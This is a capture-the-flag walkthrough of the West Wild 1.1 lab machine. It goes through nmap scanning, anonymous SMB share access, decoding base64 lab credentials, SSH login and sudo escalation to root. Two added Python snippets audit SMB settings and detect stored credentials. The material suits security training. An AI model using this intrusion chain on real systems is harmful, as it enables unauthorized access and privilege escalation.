West Wild 1.1

Information Gathering

Host Discovery

nmap -sn 192.168.31.0/24

The target IP is 192.168.31.9

Port Scan

nmap -sT --min-rate=10000 -p- 192.168.31.9 -oA nmapscan/ports

Scan every port at a minimum rate of 10000 packets per second and save the results in all output formats to the given directory.

Scan results:

┌──(root㉿lkk)-[/home/lkk]
└─# nmap -sT --min-rate=10000 -p- 192.168.31.9 -oA nmapscan/ports
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-14 14:16 CST
Nmap scan report for WestWild (192.168.31.9)
Host is up (0.0013s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:49:E0:2E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.67 seconds

Service Scan

TCP scan

nmap -sT -sV -sC -O -p22,80,139,445 192.168.31.9 -oA nmapscan/detail

-sT: TCP connect scan

-sV: probe service versions

-sC: run the default NSE scripts

-O: detect the operating system

-p: specify the ports to scan

Scan results:

┌──(root㉿lkk)-[/home/lkk]
└─# nmap -sT -sC -sV -O -p22,80,139,445 192.168.31.9 -oA nmapscan/detail
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-14 14:24 CST
Nmap scan report for WestWild (192.168.31.9)
Host is up (0.00032s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 104594fea72f028a9b211a31c5033048 (RSA)
| 256 9794178618e28e7a738e412076ba5173 (ECDSA)
|_ 256 2381c776bb3778ee3b73e255ad813272 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 00:0C:29:49:E0:2E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h00m00s, deviation: 1h43m55s, median: 0s
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: WESTWILD, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time:
| date: 2023-10-14T06:25:00
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: westwild
| NetBIOS computer name: WESTWILD\x00
| Domain name: \x00
| FQDN: westwild
|_ System time: 2023-10-14T09:25:00+03:00

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.13 seconds

Pay particular attention to the script output under "Host script results".

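The "Host script results" block above is where the weak SMB settings show up (guest session accepted, signing disabled or optional, Samba version disclosed). As an added example that is not part of the original write-up, here is a small parser that turns that NSE output into findings a defender can act on; the sample text is the relevant excerpt of the scan above with nmap's indentation restored.

```python
import re

# Excerpt of the "Host script results" from the nmap -sC scan above, indentation restored.
NMAP_HOST_SCRIPTS = """\
|_clock-skew: mean: -1h00m00s, deviation: 1h43m55s, median: 0s
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
"""

HEADER = re.compile(r"^\|_?\s?([A-Za-z0-9_-]+):\s*(.*)$")  # "| smb-security-mode:" or "|_clock-skew: ..."
CHILD = re.compile(r"^\|_?\s{2,}(.*\S)\s*$")                # "|   account_used: guest"

def parse_host_scripts(text):
    """Group NSE output into {script_name: [child lines]}; an inline header value becomes the first child."""
    scripts, current = {}, None
    for line in text.splitlines():
        child = CHILD.match(line)
        if child and current:
            scripts[current].append(child.group(1))
            continue
        header = HEADER.match(line)
        if header:
            current = header.group(1)
            scripts[current] = [header.group(2)] if header.group(2) else []
    return scripts

def assess_smb(scripts):
    """Flag the SMB weaknesses the scan exposes: guest sessions, optional signing, version disclosure."""
    findings = []
    sec = dict(kv.split(": ", 1) for kv in scripts.get("smb-security-mode", []) if ": " in kv)
    if sec.get("account_used") == "guest":
        findings.append("SMB1 guest/null session accepted")
    if sec.get("message_signing", "").startswith("disabled"):
        findings.append("SMB1 message signing disabled")
    if any("not required" in line for line in scripts.get("smb2-security-mode", [])):
        findings.append("SMB2 message signing not required")
    version = re.search(r"Samba ([\w.-]+)", " ".join(scripts.get("smb-os-discovery", [])))
    if version:
        findings.append(f"Samba version disclosed: {version.group(1)}")
    return findings
```

Each finding maps to a Samba hardening step (disable guest access, set `server signing = mandatory`, hide the version banner); the parser works on the saved `-oN` normal output without re-scanning.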
UDP Scan

sudo nmap -sU --top-ports 20 192.168.31.9 -oA nmapscan/udp

-sU: use UDP

--top-ports: scan only the 20 most common ports

Scan results:

┌──(root㉿lkk)-[/home/lkk]
└─# sudo nmap -sU --top-ports 20 192.168.31.9 -oA nmapscan/udp
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-14 14:28 CST
Nmap scan report for WestWild (192.168.31.9)
Host is up (0.00043s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:49:E0:2E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 15.39 seconds

Although UDP scan results can be unreliable, they may be needed in special situations or when hunting for additional information.

Information Analysis

Analyzing the scan results

22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)

Port 22: OpenSSH 6.6.1p1 is not an especially new version, but the chance of an exploitable vulnerability in the SSH service itself is very small.

80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

Port 80: Apache, presumably a web server.

| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: westwild
| NetBIOS computer name: WESTWILD\x00
| Domain name: \x00
| FQDN: westwild
|_ System time: 2023-10-14T09:25:00+03:00

Samba name: westwild

Prioritizing the targets

Port 22 is the least likely to be vulnerable, so it has the lowest priority.

Ports 139 and 445 run Samba, which may leak information, so they should be tackled first.

If Samba yields only limited information, the focus shifts to port 80.

The order is therefore:

  • 139、445
  • 80
  • 22

nmap's vulnerability scripts can be run first for a further scan:

nmap --script=vuln -p22,80,139,445 192.168.31.9 -oA nmapscan/vuln

Scan results:

┌──(root㉿lkk)-[/home/lkk]
└─# nmap -script=vuln -p22,80,139,445 192.168.31.9 -oA nmapscan/voln
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-14 14:54 CST
Stats: 0:00:15 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 83.33% done; ETC: 14:54 (0:00:03 remaining)
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for WestWild (192.168.31.9)
Host is up (0.00045s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:49:E0:2E (VMware)

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-061: false

Nmap done: 1 IP address (1 host up) scanned in 346.34 seconds

Trying it out

Use smbmap to enumerate the Samba shares

smbmap -H 192.168.31.9

Result:

┌──(root㉿lkk)-[/home/lkk]
└─# smbmap -H 192.168.31.9
[+] Guest session IP: 192.168.31.9:445 Name: WestWild
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
wave READ ONLY WaveDoor
IPC$ NO ACCESS IPC Service (WestWild server (Samba, Ubuntu))

Three Samba shares are listed.

print$ and IPC$ are default shares, but both show "NO ACCESS".

wave is readable, so try connecting to it.

Connecting to SMB

smbclient //192.168.31.9/wave

┌──(root㉿lkk)-[/home/lkk]
└─# smbclient //192.168.31.9/wave
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jul 30 13:18:56 2019
.. D 0 Fri Aug 2 07:02:20 2019
FLAG1.txt N 93 Tue Jul 30 10:31:05 2019
message_from_aveng.txt N 115 Tue Jul 30 13:21:48 2019

1781464 blocks of size 1024. 285180 blocks available
smb: \> prompt
smb: \> mget *.txt
getting file \FLAG1.txt of size 93 as FLAG1.txt (30.3 KiloBytes/sec) (average 30.3 KiloBytes/sec)
getting file \message_from_aveng.txt of size 115 as message_from_aveng.txt (56.1 KiloBytes/sec) (average 40.6 KiloBytes/sec)
smb: \>

Two files are found; download both of them.

(The prompt command disables the per-file confirmation when downloading.)

View the downloaded files

┌──(root㉿lkk)-[/home/lkk]
└─# ls
公共 视频 文档 音乐 FLAG1.txt message_from_aveng.txt starting_point_dguthacker.ovpn
模板 图片 下载 桌面 lab_dguthacker.ovpn nmapscan

┌──(root㉿lkk)-[/home/lkk]
└─# cat message_from_aveng.txt
Dear Wave ,
Am Sorry but i was lost my password ,
and i believe that you can reset it for me .
Thank You
Aveng

┌──(root㉿lkk)-[/home/lkk]
└─# cat FLAG1.txt
RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K

The contents of FLAG1.txt look like base64.

message_from_aveng.txt: Aveng has lost his password and asks Wave to reset it.

Decode the base64

echo RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K | base64 -d

┌──(root㉿lkk)-[/home/lkk]
└─# echo RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K | base64 -d
Flag1{Welcome_T0_THE-W3ST-W1LD-B0rder}
user:wavex
password:door+open

Plaintext in one step.

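The guest-readable share handed out a username and password with nothing more than a base64 decode. As an added example that is not part of the original write-up, here is a small audit routine a share owner could run over the files in a share to catch credentials stored in the clear or hidden inside base64 blobs like FLAG1.txt; the sample inputs are the two files downloaded above, embedded as a constructed dict.

```python
import base64
import binascii
import re

# Sample inputs: the two files from the wave share above (constructed dict, same contents).
SAMPLE_FILES = {
    "FLAG1.txt": "RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K\n",
    "message_from_aveng.txt": "Dear Wave ,\nAm Sorry but i was lost my password ,\nand i believe that you can reset it for me .\n",
}

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")  # long base64-alphabet runs worth trying to decode
CRED_LINE = re.compile(r"^\s*(user(name)?|pass(word|wd)?|pwd)\s*[:=]\s*\S+", re.I)

def decode_if_base64(token):
    """Return the decoded text when token is strict base64 that yields printable UTF-8, else None."""
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None

def find_credentials(content):
    """List (where, line) pairs for credential-looking lines, in the clear or inside base64 blobs."""
    hits = []
    for line in content.splitlines():
        if CRED_LINE.match(line):
            hits.append(("plain", line.strip()))
        for token in B64_TOKEN.findall(line):
            decoded = decode_if_base64(token)
            if decoded is None:
                continue
            hits.extend(("base64", inner.strip()) for inner in decoded.splitlines() if CRED_LINE.match(inner))
    return hits

def audit_share(files):
    """Map each file name to its credential hits, skipping files with none."""
    report = {}
    for name, content in files.items():
        hits = find_credentials(content)
        if hits:
            report[name] = hits
    return report
```

The base64 check is strict (`validate=True`), so ordinary long words are rejected rather than producing false decodes.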
With a username and password in hand, try logging in over SSH

ssh wavex@192.168.31.9

┌──(root㉿lkk)-[/home/lkk]
└─# ssh wavex@192.168.31.9
wavex@192.168.31.9's password:
Welcome to Ubuntu 14.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Sat Oct 14 10:43:08 +03 2023

System load: 0.52 Processes: 161
Usage of /: 77.9% of 1.70GB Users logged in: 0
Memory usage: 19% IP address for eth0: 192.168.31.9
Swap usage: 0%

Graph this data and manage this system at:
https://landscape.canonical.com/

New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Sat Oct 14 10:43:08 2023
wavex@WestWild:~$ who
wavex pts/0 2023-10-14 10:59 (lkk)
wavex@WestWild:~$ uname -a
Linux WestWild 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:28:33 UTC 2019 i686 athlon i686 GNU/Linux
wavex@WestWild:~$

Login successful; look around for anything useful.

Start searching! Command practice

find / -writable -type f ! -path '/proc/*' 2>/dev/null

Search from the root directory for every file writable by the current user.

Paths under '/proc/*' are excluded and error output is discarded (querying some files in that directory typically produces errors, which would clutter the output).

A file named ififorget turns up.

Its contents reveal aveng's username and password.

sudo -l

sudo -l lists the commands the current user is allowed to run as root or as another privileged user; it is the command for checking a user's sudo rights.

sudo /bin/bash

root